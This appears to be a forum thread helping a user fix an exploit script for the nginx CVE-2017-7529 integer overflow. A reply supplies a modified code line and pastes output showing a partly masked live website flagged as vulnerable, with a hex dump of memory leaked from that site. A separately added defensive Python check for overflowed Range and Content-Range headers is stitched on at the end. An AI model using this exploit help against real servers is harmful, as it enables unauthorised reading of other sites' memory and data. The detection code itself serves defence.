Help with Exploit for CVE-2017-7529 Nginx integer overflow

Don't see any problem with syntax. What kind of errors are you getting?

If you have SSL targeting, change line 19 to the following:
NGINX:
length = int(requests.get(url, verify=False).headers.get("Content-Length", 0)) + 623
 
Code:
[+] www.nxxxxx.com is Vulnerable: TRUE
[i] Receiving Data [3453 bytes] ...
-  0000: 2d 2d 30 30 30 30 30 30 30 30 30 30 30 30 30 30  --00000000000000
-  0010: 30 30 30 30 32 35 43 6f 6e 74 65 6e 74 2d 54 79  000025Content-Ty
-  0020: 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63  pe: text/html; c
-  0030: 68 61 72 73 65 74 3d 75 74 66 2d 38 43 6f 6e 74  harset=utf-8Cont
-  0040: 65 6e 74 2d 52 61 6e 67 65 3a 20 62 79 74 65 73  ent-Range: bytes
-  0050: 20 36 31 35 35 2d 36 37 37 37 2f 36 37 37 38 3e   6155-6777/6778>
-  0060: 27 20 2b 20 73 69 74 65 73 5b 69 5d 2e 61 72 74  ' + sites[i].art
-  0070: 54 69 74 6c 65 20 2b 20 27 3c 2f 73 70 61 6e 3e  Title + '</span>
-  0080: 3c 2f 6c 69 3e 27 2b 0a 09 09 09 09 09 09 09 27  </li>'+........'
-  0090: 09 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61  .........<li cla
-  00a0: 73 73 3d 22 66 6c 20 6e 6f 74 69 63 54 69 6d 65  ss="fl noticTime
-  00b0: 22 3e 27 20 2b 20 73 69 74 65 73 5b 69 5d 2e 61  ">' + sites[i].a
-  00c0: 72 74 41 64 64 74 69 6d 65 20 2b 20 27 3c 2f 6c  rtAddtime + '</l
-  00d0: 69 3e 27 2b 0a 09 09 09 09 09 09 09 27 09 09 09  i>'+........'...
-  00e0: 09 09 09 09 09 3c 2f 75 6c 3e 27 2b 0a 09 09 09  .....</ul>'+....
-  00f0: 09 09 09 09 27 09 09 09 09 09 09 09 3c 2f 61 3e  ....'.......</a>
-  0100: 27 3b 0a 09 09 09 09 09 09 09 09 09 09 09 7d 0a  ';............}.
-  0110: 09 09 09 09 09 09 09 09 09 09 09 24 28 22 23 6e  ...........$("#n
-  0120: 6f 74 69 63 65 4c 69 73 74 22 29 2e 68 74 6d 6c  oticeList").html
-  0130: 28 68 74 6d 6c 29 3b 09 0a 09 09 09 09 09 09 09  (html);.........
-  0140: 09 09 09 09 76 61 72 20 24 6e 6f 74 69 63 65 4c  ....var $noticeL
-  0150: 69 73 74 20 3d 20 24 28 22 2e 6e 6f 74 69 63 65  ist = $(".notice
-  0160: 4c 69 73 74 20 6c 69 22 29 0a 09 09 09 09 09 09  List li").......
-  0170: 09 09 09 09 09 24 6e 6f 74 69 63 65 4c 69 73 74  .....$noticeList
-  0180: 2e 68 6f 76 65 72 28 66 75 6e 63 74 69 6f 6e 28  .hover(function(
-  0190: 29 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 76  ){.............v
-  01a0: 61 72 20 5f 74 68 69 73 20 3d 20 24 28 74 68 69  ar _this = $(thi
-  01b0: 73 29 3b 0a 09 09 09 09 09 09 09 09 09 09 09 09  s);.............
-  01c0: 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 5f 74  .............._t
-  01d0: 68 69 73 2e 61 64 64 43 6c 61 73 73 28 22 61 63  his.addClass("ac
-  01e0: 74 69 76 65 22 29 0a 09 09 09 09 09 09 09 09 09  tive")..........
-  01f0: 09 09 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a  ..},function(){.
-  0200: 09 09 09 09 09 09 09 09 09 09 09 09 76 61 72 20  ............var
-  0210: 5f 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b  _this = $(this);
-  0220: 0a 09 09 09 09 09 09 09 09 09 09 09 09 5f 74 68  ............._th
-  0230: 69 73 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22  is.removeClass("
-  0240: 61 63 74 69 76 65 22 29 0a 09 09 09 09 09 09 09  active")........
-  0250: 09 09 09 09 7d 29 0a 09 09 09 09 09 09 09 09 09  ....})..........
-  0260: 09 7d 0a 09 09 09 09 09 09 09 09 09 7d 0a 09 09  .}..........}...
-  0270: 09 09 09 09 09 09 7d 29 0a 09 09 09 09 09 09 09  ......})........
-  0280: 7d 0a 09 09 09 09 09 09 7d 29 3b 09 0a 0a 09 09  }.......});.....
-  0290: 09 09 09 7d 0a 09 09 09 09 7d 0a 09 09 09 7d 29  ...}.....}....})
-  02a0: 0a 09 09 7d 29 0a 0a 20 20 20 20 09 09 0a 0a 0a  ...})..    .....
-  02b0: 09 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 2f  ..</script>...</
-  02c0: 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 43 6f  body>.</html>.Co
-  02d0: 6e 74 65 6e 74 2d 52 61 6e 67 65 3a 20 62 79 74  ntent-Range: byt
-  02e0: 65 73 20 2d 39 32 32 33 33 37 32 30 33 36 38 35  es -922337203685
-  02f0: 34 37 36 38 35 39 39 2d 36 37 37 37 2f 36 37 37  4768599-6777/677
-  0300: 38 2d 2d 30 30 30 30 30 30 30 30 30 30 30 30 30  8--0000000000000
-  0310: 30 30 30 30 30 32 36 2d 2d 30 30 30 30 30 30 30  0000026--0000000
-  0320: 30 30 30 30 30 30 30 30 30 30 30 32 37 2d 2d 30  0000000000027--0
-  0330: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
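A defender-side check, added here as an example (it is not the thread's script and not nginx code): it flags the overflowed Content-Range value visible in the dump above, and, for a reverse proxy or WAF in front of an unpatched server, inbound Range headers whose requested byte counts do not fit a signed 64-bit integer. INT64_MAX, SAMPLE_CONTENT_RANGE and both function names are assumptions of this example.

```python
import re

INT64_MAX = (1 << 63) - 1  # off_t on 64-bit builds is a signed 64-bit integer

# Constructed sample, modelled on the multipart part header visible in the dump above.
SAMPLE_CONTENT_RANGE = "Content-Range: bytes -9223372036854768599-6777/6778"

CONTENT_RANGE_RE = re.compile(
    r"^Content-Range:\s*bytes\s+(-?\d+)-(\d+)/(\d+|\*)\s*$", re.IGNORECASE)


def content_range_is_anomalous(header_line):
    """True when a Content-Range header states a byte position that can never be
    valid: a negative first-byte-pos (the symptom in the dump), start > end, or an
    end at or beyond the declared size. Useful when reviewing proxied responses;
    a healthy origin never emits such a value."""
    m = CONTENT_RANGE_RE.match(header_line)
    if not m:
        return False
    start, end = int(m.group(1)), int(m.group(2))
    size = None if m.group(3) == "*" else int(m.group(3))
    if start < 0 or start > end:
        return True
    return size is not None and end >= size


def range_request_is_suspicious(range_value):
    """True when an inbound Range header requests byte counts that do not fit a
    signed 64-bit integer, individually or summed across all ranges. Assumed
    WAF-style pre-filter written for this example; it is not nginx's own parser."""
    m = re.match(r"^\s*bytes\s*=\s*(.+?)\s*$", range_value, re.IGNORECASE)
    if not m:
        return False
    total = 0
    for spec in m.group(1).split(","):
        first, sep, last = spec.strip().partition("-")
        if not sep or not (first or last) or not (first + last).isdigit():
            return False  # malformed spec: leave it to the server's own parser
        if not first:                 # suffix-byte-range-spec "-N": last N bytes
            total += int(last)
        elif not last:                # open-ended "N-": at least one byte from N
            total += 1
            if int(first) > INT64_MAX:
                return True
        else:                         # "first-last"
            total += max(int(last) - int(first) + 1, 0)
            if int(last) > INT64_MAX:
                return True
        if total > INT64_MAX:         # the summed size would overflow off_t
            return True
    return False
```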